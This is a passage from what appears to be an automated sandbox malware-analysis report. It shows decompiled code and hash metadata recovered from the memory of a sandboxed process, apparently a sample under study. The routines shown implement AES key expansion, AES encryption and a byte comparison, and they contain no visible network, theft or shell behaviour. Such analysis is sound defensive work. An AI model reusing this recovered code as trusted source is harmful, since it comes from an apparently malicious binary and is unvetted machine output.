                							 *((intOrPtr*)(_t501 + 0x3c)) = _t454 +  *(_t501 + 0x24);
                							_push(0x48);
                							_t374 = E004317CF();
                							 *((intOrPtr*)(_t501 + 0x34)) = _t374;
                							if(_t374 != 0) {
                								goto L17;
                							}
                							goto L16;
                						} else {
                							_t491 = 0xfffffe5c;
                							goto L133;
                						}
                					}
                					goto L10;
                				}
                				_t375 = _t260 - _t458;
                				if(_t375 == 0) {
                					goto L42;
                				}
                				_t376 = _t375 - _t458;
                				if(_t376 == 0) {
                					goto L65;
                				}
                				_t377 = _t376 - _t458;
                				if(_t377 == 0) {
                					_t385 = 1;
                					goto L73;
                				}
                				_t378 = _t377 - _t458;
                				if(_t378 == 0) {
                					goto L117;
                				}
                				if(_t378 == _t458) {
                					goto L132;
                				} else {
                					_t491 = 0xfffffed3;
                					goto L133;
                				}
                			}

























































                0x0041da6b
                0x0041da6d
                0x0041da8b
                0x00000000
                0x0041da8b
                0x0041da6f
                0x0041da71
                0x00000000
                0x00000000
                0x0041da79
                0x00000000
                0x0041da7f
                0x0041da7f
                0x00000000
                0x0041da7f

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • Opcode ID: bcb56965ed424a728ba321d2f94f1de26474605289b852d1a031e8102b7c40b2
                • Instruction ID: d9b4628a552884fe08657dda03454fe4f08494c5736acd48bf418c9c256f3f61
                • Opcode Fuzzy Hash: bcb56965ed424a728ba321d2f94f1de26474605289b852d1a031e8102b7c40b2
                • Instruction Fuzzy Hash: B032F471A087559BC719DF29C4807ABB7E5BF84308F044A2EF8958B381D778DD85CB8A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 36%
                			E00425CA8(void* __ebx, signed int* __ecx, void* __edx, void* __esi) {
                				void* __edi;
                				signed int _t250;
                				signed int _t267;
                				void* _t270;
                				signed char _t318;
                				signed int _t334;
                				signed int _t355;
                				signed int _t373;
                				signed int _t391;
                				signed int _t410;
                				signed int _t418;
                				signed int _t430;
                				signed int _t432;
                				signed int _t436;
                				intOrPtr _t437;
                				signed char _t460;
                				signed int _t464;
                				signed int _t466;
                				signed int _t469;
                				signed int _t472;
                				signed int _t474;
                				signed int _t475;
                				signed int _t478;
                				signed int _t482;
                				signed int _t488;
                				intOrPtr _t489;
                				signed char* _t499;
                				signed int _t506;
                				signed int _t512;
                				signed int _t519;
                				signed int _t525;
                				signed int _t531;
                				unsigned int _t533;
                				signed int* _t534;
                				void* _t536;
                				void* _t537;
                				signed char* _t538;
                				signed int* _t540;
                				signed int* _t541;
                				signed int* _t544;
                				void* _t545;
                				intOrPtr _t546;
                				void* _t548;
                				void* _t549;
                				void* _t550;
                				signed char* _t555;
                				void* _t559;
                				void* _t560;
                
                				_push(__ecx);
                				_t533 =  *(_t559 + 0x18);
                				_t544 = __ecx;
                				 *((intOrPtr*)(_t559 + 0x10)) = __ecx;
                				 *(__ecx + 0xf4) = _t533;
                				 *((intOrPtr*)(__ecx + 0xf0)) = (_t533 >> 2) + 6;
                				E004351E0(__ecx, __edx, _t533);
                				E00425616(_t544, _t544, _t533);
                				_t560 = _t559 + 0x10;
                				if(_t533 == 0x10) {
                					_t482 = _t544[3];
                					_t534 =  &(_t544[1]);
                					_t430 = ( *(0x466ee0 + (_t482 >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x466ae0 + (_t482 >> 0x18) * 4) & 0x000000ff ^  *(0x4672e0 + (_t482 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4666e0 + (_t482 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t544;
                					_t544[4] = _t430;
                					_t250 =  *_t534 ^ _t430;
                					_t432 = _t544[2] ^ _t250;
                					_t544[5] = _t250;
                					_t544[6] = _t432;
                					_t544[7] = _t432 ^ _t482;
                					_t545 = 4;
                					do {
                						_t534 =  &(_t534[4]);
                						_t434 = _t534[2];
                						_t122 = _t545 + 0x4656b8; // 0x2000000
                						_t545 = _t545 + 4;
                						_t488 =  *(0x466ae0 + (_t534[2] >> 0x18) * 4) & 0x000000ff ^  *(0x4672e0 + (_t534[2] >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x466ee0 + (_t434 >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x4666e0 + (_t434 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t122 ^  *(_t534 - 4);
                						_t534[3] = _t488;
                						_t267 =  *_t534 ^ _t488;
                						_t534[4] = _t267;
                						_t436 = _t534[1] ^ _t267;
                						_t534[5] = _t436;
                						_t534[6] = _t534[2] ^ _t436;
                					} while (_t545 != 0x28);
                					goto L12;
                				} else {
                					if(_t533 == 0x18) {
                						_t462 = _t544[5];
                						_t540 =  &(_t544[0xa]);
                						_t506 = ( *(0x466ee0 + (_t544[5] >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x466ae0 + (_t462 >> 0x18) * 4) & 0x000000ff ^  *(0x4672e0 + (_t462 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4666e0 + (_t462 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t544;
                						_t334 = _t544[1] ^ _t506;
                						_t544[6] = _t506;
                						_t544[7] = _t334;
                						_t464 = _t544[2] ^ _t334;
                						_t544[8] = _t464;
                						_t544[9] = _t544[3] ^ _t464;
                						_t549 = 4;
                						do {
                							_t466 =  *(_t540 - 0x18) ^  *(_t540 - 4);
                							 *_t540 = _t466;
                							_t540[1] =  *(_t540 - 0x14) ^ _t466;
                							_t540 =  &(_t540[6]);
                							_t467 =  *(_t540 - 0x14);
                							_t88 = _t549 + 0x4656b8; // 0x2000000
                							_t549 = _t549 + 4;
                							_t512 =  *(0x466ae0 + ( *(_t540 - 0x14) >> 0x18) * 4) & 0x000000ff ^  *(0x4672e0 + ( *(_t540 - 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x466ee0 + (_t467 >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x4666e0 + (_t467 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t88 ^  *(_t540 - 0x28);
                							 *(_t540 - 0x10) = _t512;
                							_t355 =  *(_t540 - 0x24) ^ _t512;
                							 *(_t540 - 0xc) = _t355;
                							_t469 =  *(_t540 - 0x20) ^ _t355;
                							 *(_t540 - 8) = _t469;
                							 *(_t540 - 4) =  *(_t540 - 0x1c) ^ _t469;
                						} while (_t549 != 0x20);
                						goto L12;
                					} else {
                						if(_t533 == 0x20) {
                							_t470 = _t544[7];
                							_t541 =  &(_t544[0xc]);
                							_t519 = ( *(0x466ee0 + (_t544[7] >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x466ae0 + (_t470 >> 0x18) * 4) & 0x000000ff ^  *(0x4672e0 + (_t470 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4666e0 + (_t470 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t544;
                							_t373 = _t544[1] ^ _t519;
                							_t544[8] = _t519;
                							_t544[9] = _t373;
                							_t472 = _t544[2] ^ _t373;
                							_t544[0xa] = _t472;
                							_t544[0xb] = _t544[3] ^ _t472;
                							_t550 = 4;
                							do {
                								_t473 =  *(_t541 - 4);
                								_t474 =  *(_t541 - 0x18);
                								_t525 =  *(0x4672e0 + ( *(_t541 - 4) >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x466ee0 + ( *(_t541 - 4) >> 0x18) * 4) & 0xff000000 ^  *(0x4666e0 + (_t473 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x466ae0 + (_t473 & 0x000000ff) * 4) & 0x000000ff ^  *(_t541 - 0x20);
                								_t391 =  *(_t541 - 0x1c) ^ _t525;
                								 *_t541 = _t525;
                								_t541[1] = _t391;
                								_t541 =  &(_t541[8]);
                								_t475 = _t474 ^ _t391;
                								 *(_t541 - 0x18) = _t475;
                								 *(_t541 - 0x14) =  *(_t541 - 0x34) ^ _t475;
                								_t476 =  *(_t541 - 0x14);
                								_t48 = _t550 + 0x4656b8; // 0x2000000
                								_t550 = _t550 + 4;
                								_t531 =  *(0x466ae0 + ( *(_t541 - 0x14) >> 0x18) * 4) & 0x000000ff ^  *(0x4672e0 + ( *(_t541 - 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x466ee0 + (_t476 >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x4666e0 + (_t476 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t48 ^  *(_t541 - 0x30);
                								 *(_t541 - 0x10) = _t531;
                								_t410 =  *(_t541 - 0x2c) ^ _t531;
                								 *(_t541 - 0xc) = _t410;
                								_t478 =  *(_t541 - 0x28) ^ _t410;
                								 *(_t541 - 8) = _t478;
                								 *(_t541 - 4) =  *(_t541 - 0x24) ^ _t478;
                							} while (_t550 != 0x1c);
                							L12:
                							_t546 =  *((intOrPtr*)(_t560 + 0x10));
                							_t536 = 1;
                							if( *((intOrPtr*)(_t560 + 0x20)) == 1) {
                								_t555 = _t546 + 8;
                								_t418 =  *(_t546 + 0xf0) << 2;
                								if(_t418 != 0) {
                									_t134 = _t418 + 2; // 0x2
                									_t538 = _t555;
                									_t499 = _t546 + _t134 * 4;
                									_t548 = 0;
                									do {
                										_t548 = _t548 + 4;
                										_t418 = _t418 - 4;
                										 *((intOrPtr*)(_t538 - 8)) =  *((intOrPtr*)(_t499 - 8));
                										 *((intOrPtr*)(_t499 - 8)) =  *((intOrPtr*)(_t538 - 8));
                										 *((intOrPtr*)(_t538 - 4)) =  *((intOrPtr*)(_t499 - 4));
                										 *((intOrPtr*)(_t499 - 4)) =  *((intOrPtr*)(_t538 - 4));
                										_t460 =  *_t538;
                										 *_t538 =  *_t499;
                										_t538 =  &(_t538[0x10]);
                										_t318 = _t499[4];
                										 *_t499 = _t460;
                										_t499 = _t499 - 0x10;
                										 *(_t538 - 0xc) = _t318;
                										_t499[0x14] =  *(_t538 - 0xc);
                									} while (_t548 < _t418);
                									_t546 =  *((intOrPtr*)(_t560 + 0x10));
                									_t536 = 1;
                								}
                								if( *(_t546 + 0xf0) > _t536) {
                									do {
                										_t555 =  &(_t555[0x10]);
                										_t490 =  *(_t555 - 8);
                										_t492 =  *(_t555 - 4);
                										 *(_t555 - 8) =  *(0x4656e0 + ( *(0x466ae0 + ( *(_t555 - 8) >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x465ae0 + ( *(0x466ae0 + ( *(_t555 - 8) >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x465ee0 + ( *(0x466ae0 + (_t490 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4662e0 + ( *(0x466ae0 + ( *(_t555 - 8) & 0x000000ff) * 4) & 0x000000ff) * 4);
                										_t494 =  *_t555;
                										 *(_t555 - 4) =  *(0x4656e0 + ( *(0x466ae0 + ( *(_t555 - 4) >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x465ae0 + ( *(0x466ae0 + ( *(_t555 - 4) >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x465ee0 + ( *(0x466ae0 + (_t492 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4662e0 + ( *(0x466ae0 + ( *(_t555 - 4) & 0x000000ff) * 4) & 0x000000ff) * 4);
                										_t496 = _t555[4];
                										 *_t555 =  *(0x4656e0 + ( *(0x466ae0 + ( *_t555 >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x465ae0 + ( *(0x466ae0 + ( *_t555 >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x465ee0 + ( *(0x466ae0 + (_t494 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4662e0 + ( *(0x466ae0 + ( *_t555 & 0x000000ff) * 4) & 0x000000ff) * 4);
                										_t536 = _t536 + 1;
                										_t555[4] =  *(0x4656e0 + ( *(0x466ae0 + (_t555[4] >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x465ae0 + ( *(0x466ae0 + (_t555[4] >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x465ee0 + ( *(0x466ae0 + (_t496 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4662e0 + ( *(0x466ae0 + (_t555[4] & 0x000000ff) * 4) & 0x000000ff) * 4);
                									} while (_t536 <  *(_t546 + 0xf0));
                								}
                							}
                							_t489 =  *((intOrPtr*)(_t560 + 0x1c));
                							_t437 = _t546;
                							_pop(_t537);
                							if(_t437 != 0) {
                								_t270 = _t437 + 0xf8;
                								_push(0x10);
                								if(_t489 == 0) {
                									_push(0);
                									_push(_t270);
                									E00435760(_t537);
                								} else {
                									_push(_t489);
                									_push(_t270);
                									E004351E0();
                								}
                								return 0;
                							} else {
                								return 0xffffff53;
                							}
                						} else {
                							return 0xffffff53;
                						}
                					}
                				}
                			}

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • Opcode ID: dd53bb4457494981ac9ffff9e019512b3ae3ba674395eb300ba5a457fe9aeb8c
                • Instruction ID: 5e3034ee98431e9cf8b51dbe22b47e1a6528dca8326acab9ca032b8c61487221
                • Opcode Fuzzy Hash: dd53bb4457494981ac9ffff9e019512b3ae3ba674395eb300ba5a457fe9aeb8c
                • Instruction Fuzzy Hash: FC029F716246518FC718CF2DEC5053AB7E1EB8E301B45863EE896D7381EB34E921DB98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00425719(signed int* __ecx, void* __edx) {
                				void* _t227;
                				signed int _t245;
                				signed int _t246;
                				signed int _t274;
                				unsigned int _t394;
                				int _t407;
                				unsigned int _t410;
                				signed char _t416;
                				unsigned int _t444;
                				unsigned int _t460;
                				unsigned int _t478;
                				unsigned int _t506;
                				signed int _t510;
                				unsigned int _t513;
                				unsigned int _t514;
                				unsigned int _t521;
                				void* _t525;
                				unsigned int _t526;
                				signed int _t528;
                				signed int _t529;
                				signed int* _t530;
                				signed int _t532;
                				int _t534;
                				signed int* _t535;
                				signed int* _t536;
                				unsigned int _t540;
                				void* _t542;
                				void* _t543;
                
                				_t535 = __ecx;
                				_t525 = __edx;
                				_t540 =  *(__ecx + 0xf0) >> 1;
                				if(_t540 <= 7 && _t540 != 0) {
                					_t407 = 4;
                					E004351E0(_t542 + 0x28, __edx, _t407);
                					E004351E0(_t542 + 0x34, _t525 + 4, _t407);
                					E004351E0(_t542 + 0x3c, _t525 + 8, _t407);
                					E004351E0(_t542 + 0x44, _t525 + 0xc, _t407);
                					_t543 = _t542 + 0x30;
                					 *(_t543 + 0x28) = E004255F6( *((intOrPtr*)(_t542 + 0x50))) ^ _t535[1];
                					 *(_t543 + 0x1c) = E004255F6( *(_t543 + 0x1c)) ^ _t535[2];
                					 *(_t543 + 0x20) = E004255F6( *(_t543 + 0x18)) ^ _t535[3];
                					_t245 = E004255F6( *(_t543 + 0x24));
                					_t246 = E004256FC();
                					_t526 =  *(_t543 + 0x1c);
                					_t410 = _t245 ^  *_t535 | _t246;
                					_t506 =  *(_t543 + 0x20);
                					 *(_t543 + 0x20) =  *(0x466ee0 + (_t526 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x466ae0 + ( *(_t543 + 0x28) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4666e0 + (_t410 >> 0x18) * 4) ^  *(0x4672e0 + (_t506 & 0x000000ff) * 4) ^ _t535[4];
                					 *(_t543 + 0x18) =  *(0x466ee0 + (_t506 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x466ae0 + (_t526 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4666e0 + ( *(_t543 + 0x28) >> 0x18) * 4) ^  *(0x4672e0 + (_t410 & 0x000000ff) * 4) ^ _t535[5];
                					 *(_t543 + 0x10) =  *(0x466ae0 + (_t506 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4666e0 + (_t526 >> 0x18) * 4);
                					 *(_t543 + 0x10) =  *(_t543 + 0x10) ^  *(0x466ee0 + (_t410 >> 0x00000008 & 0x000000ff) * 4);
                					_t444 =  *(_t543 + 0x28);
                					_t528 =  *(_t543 + 0x10) ^  *(0x4672e0 + (_t444 & 0x000000ff) * 4);
                					 *(_t543 + 0x10) = _t528;
                					 *(_t543 + 0x10) = _t528 ^ _t535[6];
                					_t510 =  *(0x4666e0 + (_t506 >> 0x18) * 4) ^  *(0x466ee0 + (_t444 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x466ae0 + (_t410 >> 0x00000010 & 0x000000ff) * 4);
                					_t274 =  *(_t543 + 0x1c) & 0x000000ff;
                					while(1) {
                						_t512 = _t510 ^  *(0x4672e0 + _t274 * 4) ^ _t535[7];
                						_t536 =  &(_t535[8]);
                						 *(_t543 + 0x24) = _t536;
                						 *(_t543 + 0x14) = _t510 ^  *(0x4672e0 + _t274 * 4) ^ _t535[7];
                						_t540 = _t540 - 1;
                						if(_t540 == 0) {
                							break;
                						}
                						_t529 =  *(_t543 + 0x10);
                						_t513 =  *(_t543 + 0x20);
                						 *(_t543 + 0x1c) =  *(0x466ee0 + (_t529 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x466ae0 + ( *(_t543 + 0x18) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4666e0 + (_t513 >> 0x18) * 4) ^  *(0x4672e0 + ( *(_t543 + 0x14) & 0x000000ff) * 4) ^  *_t536;
                						 *(_t543 + 0x28) =  *(0x466ee0 + ( *(_t543 + 0x14) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x466ae0 + (_t529 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4666e0 + ( *(_t543 + 0x18) >> 0x18) * 4) ^  *(0x4672e0 + (_t513 & 0x000000ff) * 4) ^ _t536[1];
                						 *(_t543 + 0x14) =  *(_t543 + 0x14) >> 0x18;
                						_t460 = _t513;
                						_t514 =  *(_t543 + 0x18);
                						_t416 =  *(0x466ae0 + ( *(_t543 + 0x14) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4666e0 + (_t529 >> 0x18) * 4) ^  *(0x466ee0 + (_t460 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4672e0 + (_t514 & 0x000000ff) * 4) ^ _t536[2];
                						_t530 =  *(_t543 + 0x24);
                						_t521 =  *(0x4666e0 +  *(_t543 + 0x14) * 4) ^  *(0x466ee0 + (_t514 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x466ae0 + (_t460 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4672e0 + (_t529 & 0x000000ff) * 4) ^ _t536[3];
                						 *(_t543 + 0x20) =  *(0x466ee0 + (_t416 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x466ae0 + ( *(_t543 + 0x28) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4666e0 + ( *(_t543 + 0x1c) >> 0x18) * 4) ^  *(0x4672e0 + (_t521 & 0x000000ff) * 4) ^ _t530[4];
                						_t535 = _t530;
                						 *(_t543 + 0x18) =  *(0x466ee0 + (_t521 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x466ae0 + (_t416 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4666e0 + ( *(_t543 + 0x28) >> 0x18) * 4) ^  *(0x4672e0 + ( *(_t543 + 0x1c) & 0x000000ff) * 4) ^ _t535[5];
                						 *(_t543 + 0x10) =  *(0x466ae0 + (_t521 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4666e0 + (_t416 >> 0x18) * 4);
                						 *(_t543 + 0x10) =  *(_t543 + 0x10) ^  *(0x466ee0 + ( *(_t543 + 0x1c) >> 0x00000008 & 0x000000ff) * 4);
                						_t478 =  *(_t543 + 0x28);
                						_t532 =  *(_t543 + 0x10) ^  *(0x4672e0 + (_t478 & 0x000000ff) * 4);
                						 *(_t543 + 0x10) = _t532;
                						 *(_t543 + 0x10) = _t532 ^ _t535[6];
                						_t510 =  *(0x4666e0 + (_t521 >> 0x18) * 4) ^  *(0x466ee0 + (_t478 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x466ae0 + ( *(_t543 + 0x1c) >> 0x00000010 & 0x000000ff) * 4);
                						_t274 = _t416 & 0x000000ff;
                					}
                					_t533 = _t536;
                					_t417 =  *(_t543 + 0x20);
                					 *(_t543 + 0x24) = E004255F6( *(0x4672e0 + ( *(_t543 + 0x18) >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4666e0 + ( *(_t543 + 0x10) >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x466ee0 + ( *(_t543 + 0x20) >> 0x18) * 4) & 0xff000000 ^  *(0x466ae0 + (_t512 & 0x000000ff) * 4) & 0x000000ff ^  *_t536);
                					 *(_t543 + 0x20) = E004255F6( *(0x4672e0 + ( *(_t543 + 0x10) >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4666e0 + ( *(_t543 + 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x466ee0 + ( *(_t543 + 0x18) >> 0x18) * 4) & 0xff000000 ^  *(0x466ae0 + (_t417 & 0x000000ff) * 4) & 0x000000ff ^ _t533[1]);
                					 *(_t543 + 0x1c) = E004255F6( *(0x4672e0 + ( *(_t543 + 0x14) >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x466ee0 + ( *(_t543 + 0x10) >> 0x18) * 4) & 0xff000000 ^  *(0x4666e0 + (_t417 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x466ae0 + ( *(_t543 + 0x18) & 0x000000ff) * 4) & 0x000000ff ^ _t533[2]);
                					_t394 = E004255F6( *(0x4672e0 + (_t417 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x466ee0 + ( *(_t543 + 0x14) >> 0x18) * 4) & 0xff000000 ^  *(0x4666e0 + ( *(_t543 + 0x18) >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x466ae0 + ( *(_t543 + 0x10) & 0x000000ff) * 4) & 0x000000ff ^ _t533[3]);
                					_t538 =  *((intOrPtr*)(_t543 + 0x30));
                					_t534 = 4;
                					 *(_t543 + 0x18) = _t394;
                					E004351E0( *((intOrPtr*)(_t543 + 0x30)), _t543 + 0x24, _t534);
                					E004351E0( *((intOrPtr*)(_t543 + 0x30)) + 4, _t543 + 0x30, _t534);
                					E004351E0(_t538 + 8, _t543 + 0x38, _t534);
                					return E004351E0(_t538 + 0xc, _t543 + 0x40, _t534);
                				}
                				return _t227;
                			}

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 172271c9f3a8d2f206ea040ba3aa5d2b81077719746b0b9d367e61a4bdcfc719
                • Instruction ID: c78283a727a1133add5d327dfcd8014987219566089c4cde3c96dc6abaca164a
                • Opcode Fuzzy Hash: 172271c9f3a8d2f206ea040ba3aa5d2b81077719746b0b9d367e61a4bdcfc719
                • Instruction Fuzzy Hash: 0CF18D756242548FC704DF1DE89182BB3E1FB89340B45492EF582C7391DF78EA25CBAA
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00436603(void* __edx, void* __esi) {
                				signed int _t192;
                				signed char _t193;
                				signed char _t194;
                				signed char _t195;
                				signed char _t196;
                				signed char _t198;
                				signed int _t241;
                				void* _t287;
                				void* _t292;
                				void* _t294;
                				void* _t296;
                				void* _t298;
                				void* _t300;
                				void* _t302;
                				void* _t304;
                				void* _t306;
                				void* _t308;
                				void* _t310;
                				void* _t312;
                				void* _t314;
                				void* _t316;
                				void* _t318;
                				void* _t320;
                				void* _t322;
                				void* _t324;
                				void* _t326;
                				void* _t327;
                
                				_t327 = __esi;
                				_t287 = __edx;
                				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
                					_t241 = 0;
                					L15:
                					if(_t241 != 0) {
                						goto L2;
                					}
                					_t193 =  *(_t327 - 0x1a);
                					if(_t193 ==  *(_t287 - 0x1a)) {
                						_t241 = 0;
                						L26:
                						if(_t241 != 0) {
                							goto L2;
                						}
                						_t194 =  *(_t327 - 0x16);
                						if(_t194 ==  *(_t287 - 0x16)) {
                							_t241 = 0;
                							L37:
                							if(_t241 != 0) {
                								goto L2;
                							}
                							_t195 =  *(_t327 - 0x12);
                							if(_t195 ==  *(_t287 - 0x12)) {
                								_t241 = 0;
                								L48:
                								if(_t241 != 0) {
                									goto L2;
                								}
                								_t196 =  *(_t327 - 0xe);
                								if(_t196 ==  *(_t287 - 0xe)) {
                									_t241 = 0;
                									L59:
                									if(_t241 != 0) {
                										goto L2;
                									}
                									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
                										_t241 = 0;
                										L70:
                										if(_t241 != 0) {
                											goto L2;
                										}
                										_t198 =  *(_t327 - 6);
                										if(_t198 ==  *(_t287 - 6)) {
                											_t241 = 0;
                											L81:
                											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
                											}
                											goto L2;
                										}
                										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
                										if(_t292 == 0) {
                											L74:
                											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
                											if(_t294 == 0) {
                												L76:
                												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
                												if(_t296 == 0) {
                													L78:
                													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
                													if(_t241 != 0) {
                														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                													}
                													goto L81;
                												}
                												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
                												if(_t241 != 0) {
                													goto L2;
                												}
                												goto L78;
                											}
                											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
                											if(_t241 != 0) {
                												goto L2;
                											}
                											goto L76;
                										}
                										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
                										if(_t241 != 0) {
                											goto L2;
                										}
                										goto L74;
                									}
                									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
                									if(_t298 == 0) {
                										L63:
                										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
                										if(_t300 == 0) {
                											L65:
                											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
                											if(_t302 == 0) {
                												L67:
                												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
                												if(_t241 != 0) {
                													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                												}
                												goto L70;
                											}
                											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
                											if(_t241 != 0) {
                												goto L2;
                											}
                											goto L67;
                										}
                										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
                										if(_t241 != 0) {
                											goto L2;
                										}
                										goto L65;
                									}
                									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
                									if(_t241 != 0) {
                										goto L2;
                									}
                									goto L63;
                								}
                								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
                								if(_t304 == 0) {
                									L52:
                									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
                									if(_t306 == 0) {
                										L54:
                										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
                										if(_t308 == 0) {
                											L56:
                											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
                											if(_t241 != 0) {
                												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                											}
                											goto L59;
                										}
                										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
                										if(_t241 != 0) {
                											goto L2;
                										}
                										goto L56;
                									}
                									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
                									if(_t241 != 0) {
                										goto L2;
                									}
                									goto L54;
                								}
                								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
                								if(_t241 != 0) {
                									goto L2;
                								}
                								goto L52;
                							}
                							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
                							if(_t310 == 0) {
                								L41:
                								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
                								if(_t312 == 0) {
                									L43:
                									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
                									if(_t314 == 0) {
                										L45:
                										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
